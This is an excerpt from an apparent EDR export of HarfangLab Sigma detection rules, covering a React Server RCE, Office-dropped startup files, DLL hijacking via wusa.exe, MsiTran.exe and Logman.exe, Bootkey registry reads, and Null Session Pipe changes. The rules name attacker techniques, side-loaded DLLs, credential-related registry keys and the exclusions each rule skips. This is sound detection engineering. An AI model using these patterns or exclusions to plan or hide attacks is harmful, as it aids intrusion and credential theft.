# MISP\n - '/var/www/MISP/app/Console'\n # Jest worker\n - '/next/dist/compiled/jest-worker/'\n # Supercronic\n - 'supercronic -quiet /app/docker/cronjobs'\n # PostCSS\n - '.next/dev/build/postcss.js'\n - 'cat /proc/mounts'\n - 'cat /proc/stat'\n - 'df -kPT'\n - 'df -lkPTx'\n - 'node */.next/transform.js'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "14f9f2a2-29c8-4ef3-8ed2-d6f654fffb80",
"rule_name": "Potential React-Server RCE Exploitation (Linux)",
"rule_description": "Detects suspicious command-line related to the exploitation of the React Server vulnerability (CVE-2025-55182).\nCVE-2025-55182 is a critical React Server vulnerability that allows remote code execution through specially crafted requests sent to applications using affected React or Next.js versions.\nIt is recommended to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2025-12-05",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1548f31b-b093-436b-a9cb-97bc28e00de7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088839Z",
"creation_date": "2026-03-23T11:45:34.088841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_persistence_file_startup_phishing_attack.yml",
"content": "title: Suspicious File Added/Modified in Startup Directory by Office Application\nid: 1548f31b-b093-436b-a9cb-97bc28e00de7\ndescription: |\n Detects when a file is added or modified in the startup directory in relation with a phishing attack.\n After compromising a host, attackers may achieve persistence by adding a program to a startup folder.\n It is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2022/06/20\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection_event:\n Kind:\n - 'create'\n - 'write'\n Path|contains:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' # individual user : c:\\users\\xxx\\appdata\\...\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\' # all users\n\n selection_image:\n ProcessImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_parentimage:\n ProcessParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n\n selection_extension:\n Path|endswith:\n - '.bat'\n - '.chm'\n - '.cmd'\n - '.cpl'\n - '.exe'\n - '.hta'\n - '.js'\n - '.jse'\n - '.lnk'\n - '.ps1'\n - '.scr'\n - '.vbe'\n - '.vbs'\n - '.wsf'\n\n exclusion_onenote:\n ProcessImage: '*\\Office??\\ONENOTE.EXE'\n Path:\n - '*OneNote*.lnk' # Envoyer a OneNote.lnk / Send to OneNote.lnk / An OneNote senden.lnk\n - '*\\OneNote ???? *.lnk' # OneNote 2010 Screen Clipper and Launcher.lnk / OneNote 2010 - Capture d'ecran et lancement.lnk\n\n exclusion_astngo:\n ProcessCommandLine|contains: '--single-argument https://my.astngo.com/'\n\n condition: selection_event and selection_extension and (selection_image or selection_parentimage) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1548f31b-b093-436b-a9cb-97bc28e00de7",
"rule_name": "Suspicious File Added/Modified in Startup Directory by Office Application",
"rule_description": "Detects when a file is added or modified in the startup directory in relation with a phishing attack.\nAfter compromising a host, attackers may achieve persistence by adding a program to a startup folder.\nIt is recommended to analyze the process dropping the file as well as the file itself to look for malicious content.\n",
"rule_creation_date": "2022-06-20",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "156f56a4-6a01-405e-9c87-d4546f76e6a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588600Z",
"creation_date": "2026-03-23T11:45:34.588603Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588611Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wusa.yml",
"content": "title: DLL Hijacking via wusa.exe\nid: 156f56a4-6a01-405e-9c87-d4546f76e6a1\ndescription: |\n Detects potential Windows DLL Hijacking via wusa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wusa.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dpx.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "156f56a4-6a01-405e-9c87-d4546f76e6a1",
"rule_name": "DLL Hijacking via wusa.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wusa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15957b9b-c39e-4caf-af47-506917f3c1e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095096Z",
"creation_date": "2026-03-23T11:45:34.095098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40",
"https://attack.mitre.org/techniques/T1552/002/"
],
"name": "t1003_002_susp_registry_read_bootkey.yml",
"content": "title: Windows Bootkey Read from Registry\nid: 15957b9b-c39e-4caf-af47-506917f3c1e2\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\n The BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\n This key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-descriptor-modification-2cf505ec5c40\n - https://attack.mitre.org/techniques/T1552/002/\ndate: 2024/04/02\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject|startswith:\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\JD\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\SKEW1\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\GBG\\'\n - 'HKLM\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\LSA\\DATA\\'\n - 'HKLM\\SYSTEM\\CONTROLSET???\\CONTROL\\LSA\\DATA\\'\n\n filter_lsass:\n Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n filter_logonui:\n ProcessImage: '?:\\Windows\\System32\\logonui.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_setup_host:\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n # Altered versions of Windows can sometimes be unsigned.\n - Image: '?:\\$WINDOWS.~BT\\Sources\\\\*.exe'\n ProcessParentOriginalFileName: 'SetupPrep.exe'\n\n # Too many fp, maybe a normal behavior in order to decode some information in registry\n exclusion_regedit:\n Image:\n - '?:\\Windows\\regedit.exe'\n - '?:\\Windows\\SysWOW64\\regedit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_ivanti:\n Image|endswith: '\\SupportToolkit.exe'\n ProcessOriginalFileName: 'SupportToolkit.exe'\n ProcessDescription: 'Ivanti Support Toolkit'\n\n exclusion_fennec_windows:\n ProcessOriginalFileName: 'Fox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15957b9b-c39e-4caf-af47-506917f3c1e2",
"rule_name": "Windows Bootkey Read from Registry",
"rule_description": "Detects a suspicious read operation on registry keys storing Windows Bootkey also referred to as the SysKey.\nThe BootKey/SysKey is an encryption key that is stored in the Windows SYSTEM registry hive.\nThis key is used by several Windows components to encrypt sensitive information like the AD database, machine account password or system certificates.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2024-04-02",
"rule_modified_date": "2025-09-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1012",
"attack.t1552.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621211Z",
"creation_date": "2026-03-23T11:45:34.621213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621217Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20230726161232/",
"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity",
"https://attack.mitre.org/techniques/T1021/001/",
"https://attack.mitre.org/techniques/T1021/002/",
"https://attack.mitre.org/techniques/T1071/"
],
"name": "t1021_001_nullsessionpipe_added_in_registry.yml",
"content": "title: Null Session Pipe Added in Registry\nid: 15aecbb0-3084-4252-96c2-c5ab1b3d4ea3\ndescription: |\n Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\n Attackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\n It is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\nreferences:\n - https://web.archive.org/web/20230726161232/\n - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\n - https://attack.mitre.org/techniques/T1021/001/\n - https://attack.mitre.org/techniques/T1021/002/\n - https://attack.mitre.org/techniques/T1071/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters\\NullSessionPipes'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_expressconnect:\n ProcessImage:\n - '?:\\Program Files\\ExpressConnect\\ExpressConnect.exe'\n - '?:\\Program Files (x86)\\ExpressConnect\\ExpressConnect.exe'\n\n exclusion_raps:\n ProcessImage: '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPS.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rivet Networks LLC'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_rivet:\n ProcessParentImage:\n - '?:\\Program Files\\Rivet Networks\\SmartByte\\RAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KAPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\KSPSService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendSoftAPService.exe'\n - '?:\\Windows\\System32\\drivers\\RivetNetworks\\Killer\\xTendUtilityService.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n Details:\n - ';netlogon;samr'\n - ';netlogon;samr;lsarpc'\n\n exclusion_etiam:\n ProcessImage: '?:\\Program Files (x86)\\ETIAM\\IDA\\idaSCP.exe'\n\n exclusion_epson:\n ProcessImage|endswith: '\\PLPOUSVR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SEIKO EPSON CORPORATION'\n\n exclusion_hp:\n ProcessImage|endswith: '\\flcdlock.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'HP Inc.'\n - 'Hewlett Packard Enterprise Company'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15aecbb0-3084-4252-96c2-c5ab1b3d4ea3",
"rule_name": "Null Session Pipe Added in Registry",
"rule_description": "Detects the modification of the LanmanServer Registry configuration allowing for Null Sessions to access a new pipe.\nAttackers can use this technique to allow all anonymous users to access a specific pipe, for example to perform lateralization through RDP.\nIt is recommended to analyze the process responsible for the registry modification to look for malicious content or actions, and to investigate any subsequent suspicious actions (e.g RDP) on the host.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1071",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587835Z",
"creation_date": "2026-03-23T11:45:34.587838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msitran.yml",
"content": "title: DLL Hijacking via MsiTran.exe\nid: 15cc636a-9f89-4eaa-b9fe-04eb31aca42e\ndescription: |\n Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.elastic.co/fr/security-labs/exploring-the-ref2731-intrusion-set\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/04\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsiTran.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x??\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15cc636a-9f89-4eaa-b9fe-04eb31aca42e",
"rule_name": "DLL Hijacking via MsiTran.exe",
"rule_description": "Detects potential Windows DLL Hijacking via the Microsoft developer tool MsiTran.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-04",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593856Z",
"creation_date": "2026-03-23T11:45:34.593859Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593867Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logman.yml",
"content": "title: DLL Hijacking via Logman.exe\nid: 15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a\ndescription: |\n Detects potential Windows DLL Hijacking via Logman.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Logman.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\pdh.dll'\n - '\\pla.dll'\n - '\\sspicli.dll'\n - '\\wevtapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "15ce1c4e-d54d-4d1b-9248-cfbf35c8c14a",
"rule_name": "DLL Hijacking via Logman.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Logman.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "15f0e956-c482-487d-a3f5-28d5c667c6a3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
